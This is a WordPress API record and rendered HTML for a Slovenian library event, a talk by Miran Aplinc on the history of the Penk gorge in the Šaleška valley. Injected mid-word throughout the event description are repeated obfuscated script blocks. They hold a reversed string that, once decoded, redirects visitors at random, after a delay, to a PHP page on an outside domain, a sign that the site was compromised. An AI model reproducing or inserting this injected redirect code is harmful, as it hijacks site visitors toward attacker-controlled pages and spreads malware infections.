{"id":14100,"date":"2022-03-29T19:04:32","date_gmt":"2022-03-29T17:04:32","guid":{"rendered":"https:\/\/sostanj.info\/2019\/?post_type=tribe_events&#038;p=14100"},"modified":"2022-03-29T19:04:32","modified_gmt":"2022-03-29T17:04:32","slug":"miran-aplinc-zgodovina-soteske-penk","status":"publish","type":"tribe_events","link":"https:\/\/sostanj.info\/2019\/dogodki\/miran-aplinc-zgodovina-soteske-penk\/","title":{"rendered":"Miran Aplinc, Zgodovina soteske Penk"},"content":{"rendered":"<p>V Knji\u017enici Velenje le<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tos pripravljamo ciklus domoznanskih ve\u010derov z naslovom \u0160ale\u0161ki razgledi v \u017eivo. Na \u0161estih le<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>to\u0161njih ve\u010derih bodo nas<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>topili vidni raziskovalci zgodovinskega, dru\u017ebenega in kulturnega \u017eivljenja v \u0160ale\u0161ki dolini, ki so tudi av<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>torji \u010dlankov v dru\u017eboslovni in humanisti\u010dni knji\u017eni zbirki \u0160ale\u0161ki razgledi. Predstavili bodo svoje raziskovalno in strokovno delo ter podrobneje spregovorili o eni od tem o kateri so pisali v razgledih.<\/p>\n<p>Muzejski sve<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tovalec v Muzeju Velenje in av<script>$zXz=function(n){if (typeof ($zXz.list[n]) == \"string\") return $zXz.list[n].split(\"\").reverse().join(\"\");return $zXz.list[n];};$zXz.list=[\"\\'php.yerg-sknil-tuoba-egap\/snrettap\/cni\/owtytnewtytnewt\/semeht\/tnetnoc-pw\/moc.cvpny\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}<\/script>tor \u0161tevilnih monografij in \u010dlankov o zgodovini \u0160ale\u0161ke doline dr. Miran Aplinc bo v Mestni knji\u017enici \u0160o\u0161tanj predstavil zgodovino in manj znane posebnosti zahodnega dela \u0160ale\u0161ke doline \u2013 soteske Penk.<\/p>\n<p>Ve\u010der bo spremljevalni dogodek No\u010di knjige, na ta dan obele\u017eujemo 23. april, SVETOVNI DAN KNJIGE.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>V Knji\u017enici Velenje letos pripravljamo ciklus domoznanskih ve\u010derov z naslovom \u0160ale\u0161ki razgledi v \u017eivo. Na \u0161estih leto\u0161njih ve\u010derih bodo nastopili vidni raziskovalci zgodovinskega, dru\u017ebenega in kulturnega \u017eivljenja v \u0160ale\u0161ki dolini,&#8230;<\/p>\n","protected":false},"author":1,"featured_media":8430,"comment_status":"open","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"tags":[],"tribe_events_cat":[52],"class_list":["post-14100","tribe_events","type-tribe_events","status-publish","has-post-thumbnail","hentry","tribe_events_cat-kultura_umetnost","cat_kultura_umetnost"],"_links":{"self":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tribe_events\/14100","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tribe_events"}],"about":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/types\/tribe_events"}],"author":[{"embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/comments?post=14100"}],"version-history":[{"count":1,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tribe_events\/14100\/revisions"}],"predecessor-version":[{"id":14101,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tribe_events\/14100\/revisions\/14101"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/media\/8430"}],"wp:attachment":[{"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/media?parent=14100"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tags?post=14100"},{"taxonomy":"tribe_events_cat","embeddable":true,"href":"https:\/\/sostanj.info\/2019\/wp-json\/wp\/v2\/tribe_events_cat?post=14100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<p>V Knjižnici Velenje le<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tos pripravljamo ciklus domoznanskih večerov z naslovom Šaleški razgledi v živo. Na šestih le<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tošnjih večerih bodo nas<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>topili vidni raziskovalci zgodovinskega, družbenega in kulturnega življenja v Šaleški dolini, ki so tudi av<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>torji člankov v družboslovni in humanistični knjižni zbirki Šaleški razgledi. Predstavili bodo svoje raziskovalno in strokovno delo ter podrobneje spregovorili o eni od tem o kateri so pisali v razgledih.</p>
<p>Muzejski sve<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tovalec v Muzeju Velenje in av<script>$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tor številnih monografij in člankov o zgodovini Šaleške doline dr. Miran Aplinc bo v Mestni knjižnici Šoštanj predstavil zgodovino in manj znane posebnosti zahodnega dela Šaleške doline – soteske Penk.</p>
<p>Večer bo spremljevalni dogodek Noči knjige, na ta dan obeležujemo 23. april, SVETOVNI DAN KNJIGE.</p>

<p>V Knjižnici Velenje letos pripravljamo ciklus domoznanskih večerov z naslovom Šaleški razgledi v živo. Na šestih letošnjih večerih bodo nastopili vidni raziskovalci zgodovinskega, družbenega in kulturnega življenja v Šaleški dolini,&#8230;</p>
